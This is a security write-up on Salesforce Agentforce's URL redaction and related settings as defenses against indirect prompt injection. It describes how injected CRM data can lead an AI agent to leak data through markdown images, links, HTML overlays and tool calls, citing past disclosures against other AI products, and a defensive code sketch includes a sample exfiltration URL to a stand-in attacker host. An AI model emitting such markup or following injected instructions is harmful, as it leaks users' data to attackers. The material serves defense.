One key way Salesforce mitigates AI risk

What is Agentforce, and what risks does it face?

Agentforce is Salesforce's agentic AI layer. Its agents read CRM records, draft communications, and take actions, returning generated output to users inside the Salesforce web app.

Because those agents act on data they ingest (for example, Web-to-Lead submissions), an attacker who places an indirect prompt injection in that data can manipulate the agent's output to attempt several well-known attacks:

Markdown image-based data exfiltration. If the model is manipulated into outputting a markdown image hosted on an external server, with user data appended to the URL, the data is exfiltrated as soon as the image renders in chat, with no click required. PromptArmor's Threat Intelligence Team disclosed this vulnerability in several apps, including exfiltration of connected data sources from OpenAI's Codex and of sensitive emails from Superhuman AI.
Markdown link-based data exfiltration and phishing. A generated link can carry data in its URL or send the user to a credential-harvesting page dressed up as a routine action. PromptArmor demonstrated how Slack AI could be manipulated to present a malicious hyperlink that exfiltrated API keys from private Slack channels when clicked.
HTML overlay phishing. If HTML is not sanitized from agent output, manipulated output can overwrite the user's interface by rendering iframes of attacker sites. PromptArmor published on this vulnerability, showing how vLex (now Clio) rendered fake login pop-ups. The same technique was used to overwrite the entire user interface in Ollama.
HTML-based data exfiltration. If externally sourced HTML (or CSS) is generated and rendered with sensitive data appended to an element's source URL, that data is exfiltrated when the element loads. This vulnerability was disclosed to and remediated by vLex (now Clio) alongside the HTML overlay exploit, and Ollama also exhibited this risk.
Tool-call manipulation. Any agent that can call tools and interact with data can be manipulated into taking actions at the direction of a prompt injection. PromptArmor demonstrated this risk, showing that Copilot Cowork could exfiltrate files from Drive and SharePoint because of a missing human-in-the-loop step, and that ChatGPT for Google Sheets could exfiltrate user workbooks via tool-call manipulation.

The first four attacks described above share a key characteristic: each depends on an attacker-controlled URL surviving into the agent's rendered output.

The defense: URL redaction

When an agent's response is rendered inside the Salesforce web app, any URL not designated as a trusted URL is stripped from the output and replaced with the literal string [URL_REDACTED]. Because Markdown- and HTML-based data exfiltration and phishing attacks rely on untrusted URLs reaching rendered output, redacting those URLs substantially reduces the attack surface.
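To make the mechanism concrete, here is a minimal sketch of allowlist-based URL redaction. It is not Salesforce's implementation: the `TRUSTED_HOSTS` set, the regular expression, and the function name `redact_untrusted_urls` are all assumptions made for illustration, and the sketch only handles absolute http(s) URLs.

```python
import re
from urllib.parse import urlsplit

# Hypothetical allowlist standing in for the platform's trusted URL list.
TRUSTED_HOSTS = {"docs.example.com"}

PLACEHOLDER = "[URL_REDACTED]"

# Matches an http(s) URL up to whitespace or a character that usually
# closes a markdown, HTML, or CSS construct.
URL_PATTERN = re.compile(r"https?://[^\s)\"'<>]+", re.IGNORECASE)


def redact_untrusted_urls(text: str, trusted_hosts=TRUSTED_HOSTS) -> str:
    """Replace every URL whose host is not exactly allowlisted."""

    def _replace(match):
        url = match.group(0)
        try:
            host = urlsplit(url).hostname or ""
        except ValueError:
            # Malformed URLs are treated as untrusted.
            return PLACEHOLDER
        return url if host in trusted_hosts else PLACEHOLDER

    return URL_PATTERN.sub(_replace, text)


if __name__ == "__main__":
    print(redact_untrusted_urls("![x](https://attacker.example/p.png?d=SECRET)"))
    print(redact_untrusted_urls("See https://docs.example.com/guide for details"))
```

Because the host is parsed rather than matched as a substring, a URL such as `https://docs.example.com@attacker.example/x` is still redacted. A production filter would also need to handle scheme-relative URLs and other schemes, which this sketch ignores.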

How redaction addresses risks

| Attack | How Redacting URLs Mitigates It |
| --- | --- |
| Data exfiltration via markdown image. The agent emits a markdown image whose URL carries stolen data to an attacker-controlled server, firing on render. | The untrusted image URL is replaced with [URL_REDACTED], so the browser never makes the request that leaks the data. |
| Phishing via markdown link. A 'click to reauthenticate' link carries data out or points the user to a fake login. | The clickable link is replaced with [URL_REDACTED], so there is nothing for the user to click. |
| Data exfiltration via HTML/CSS. An image, iframe, or CSS background in agent-output HTML points at an attacker-controlled domain, firing a request on render. | URLs inside HTML and CSS are redacted too: the attacker-controlled image, iframe, or background source is replaced with [URL_REDACTED] before the markup renders, so the request that would carry the data out is never made. |
| Phishing via HTML overlay. Injected markup draws an attacker-controlled login screen over the chat to harvest credentials. | The fake login screen has to load attacker-hosted content. With those URLs redacted, it has nothing to load. |

This analysis describes Agentforce Chat inside the Salesforce web app. Salesforce ships many more AI features, exposes MCP servers, and presents a large attack surface overall, so URL redaction addresses only a subset of the risk. For example, the agent's ability to call tools in Agentforce requires other defenses, such as human-in-the-loop approval, to prevent attacks like the exploit against Microsoft Copilot Cowork.
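As an illustration of the human-in-the-loop idea mentioned above, the sketch below gates side-effecting tool calls behind an approval callback. It does not reflect how Agentforce or any other product implements approvals; `ToolCall`, `SENSITIVE_TOOLS`, `execute_with_approval`, and the stand-in tools are hypothetical names chosen for this example.

```python
from dataclasses import dataclass, field
from typing import Any, Callable, Dict

# Hypothetical tool names treated as having side effects or moving data.
SENSITIVE_TOOLS = frozenset({"send_email", "share_file"})


@dataclass
class ToolCall:
    name: str
    arguments: Dict[str, Any] = field(default_factory=dict)


def execute_with_approval(
    call: ToolCall,
    tools: Dict[str, Callable[..., str]],
    approve: Callable[[ToolCall], bool],
) -> str:
    """Run a tool call, pausing for a human decision on sensitive tools."""
    if call.name not in tools:
        raise KeyError(f"unknown tool: {call.name}")
    if call.name in SENSITIVE_TOOLS and not approve(call):
        # A rejected call never reaches the tool itself.
        return f"blocked: {call.name} was not approved"
    return tools[call.name](**call.arguments)


# Stand-in tools for illustration only.
TOOLS = {
    "lookup_record": lambda record_id: f"record {record_id}",
    "share_file": lambda path, recipient: f"shared {path} with {recipient}",
}
```

In a real deployment the `approve` callback would show the user the tool name and its full arguments before anything runs, so that a call planted by a prompt injection is visible and can be rejected.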

Configurations for Salesforce AI output processing

Some use cases require certain URLs to appear in model output. To allow specific URLs, configure the following:

Restrict and allowlist output URLs. To allow agents to output external URLs, add each one explicitly:

Setup → Quick Find → "Trusted URLs" → Trusted URLs → New Trusted URL

Avoid wildcard patterns that allow any site hosting user-generated or otherwise untrusted content.
On the same settings page, leave the img-src CSP directive disabled for a trusted URL unless images are meant to render from that domain. This reduces the risk of Markdown image-based data exfiltration.
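The risk of wildcard patterns can be shown with a short sketch. It uses Python's `fnmatch` as a stand-in for pattern matching and does not model the matching syntax Salesforce actually applies to trusted URLs; the host names and the `host_allowed` helper are hypothetical.

```python
from fnmatch import fnmatchcase


def host_allowed(host: str, patterns: list) -> bool:
    """Return True if the host matches any allowlist pattern."""
    host = host.lower().rstrip(".")
    return any(fnmatchcase(host, pattern.lower()) for pattern in patterns)


# An exact entry admits only the host that was reviewed.
EXACT = ["assets.example.com"]

# A wildcard entry also admits every other subdomain, including one that
# (hypothetically) serves user-uploaded content.
WILDCARD = ["*.example.com"]

if __name__ == "__main__":
    for host in ("assets.example.com", "user-uploads.example.com"):
        print(host, host_allowed(host, EXACT), host_allowed(host, WILDCARD))
```

If an attacker can upload content to any subdomain covered by the wildcard, a URL pointing there passes the allowlist and is rendered rather than redacted.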

The following Salesforce settings further reduce the risk surface for indirect prompt injection:

Mask sensitive data in the Einstein Trust Layer.

Masking works by replacing sensitive data with a placeholder before a prompt is sent to the LLM. Because the model never sees the real values, an agent under the influence of a prompt injection cannot take actions such as encoding sensitive data and appending the encoded result to a malicious URL.
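The idea can be sketched in a few lines. This is an illustration of pattern-based masking in general, not the Einstein Trust Layer's implementation: the two regular expressions, the `<LABEL_n>` placeholder format, and the `mask` and `unmask` helpers are assumptions made for the example.

```python
import re

# Simplified, hypothetical patterns; real detectors are more thorough.
PATTERNS = {
    "EMAIL": re.compile(r"[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,}"),
    "US_SSN": re.compile(r"\b\d{3}-\d{2}-\d{4}\b"),
}


def mask(prompt: str):
    """Return the masked prompt and a placeholder-to-value mapping."""
    mapping = {}
    counters = {}
    masked = prompt
    for label, pattern in PATTERNS.items():

        def _sub(match, label=label):
            value = match.group(0)
            # Reuse the placeholder when the same value appears again.
            for placeholder, original in mapping.items():
                if original == value:
                    return placeholder
            counters[label] = counters.get(label, 0) + 1
            placeholder = f"<{label}_{counters[label]}>"
            mapping[placeholder] = value
            return placeholder

        masked = pattern.sub(_sub, masked)
    return masked, mapping


def unmask(text: str, mapping: dict) -> str:
    """Restore original values in text returned to the user."""
    for placeholder, original in mapping.items():
        text = text.replace(placeholder, original)
    return text
```

Only the masked prompt would be sent to the model, so any URL the model is tricked into building can contain at most the placeholder text. The mapping stays on the trusted side and is used to restore values in the response shown to the user.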

Configure data masking here:

Setup → Einstein → Einstein Generative AI → Einstein Trust Layer → Data Masking → Large Language Model Data Masking

Turn on Large Language Model Data Masking first; it is the parent category, and the options below are only applicable once it is on.

Pattern-based masking is available and can be enabled for the following data types: Name, Email Address, Phone Number, Credit Card, US SSN, US ITIN, US Drivers License, Passport, IBAN Code, and Company Name.

Data Masking → Pattern-based → Sensitive Data

Field-based masking covers fields by compliance category (PII, HIPAA, GDPR, PCI, COPPA, and CCPA) and by data sensitivity level (Public, Internal, Confidential, Restricted, and Mission Critical).

Data Masking → Field-based → Compliance Categories / Data Sensitivity Levels

Prompt injection detection (beta)

Salesforce additionally offers a prompt injection detection setting:

Setup → Einstein → Einstein Generative AI → Einstein Trust Layer → Safety & Security → Prompt Injection Detection

However, this setting is currently in beta and subject to beta terms, under which Salesforce appears to train AI on customer data when prompt injection detection is enabled.
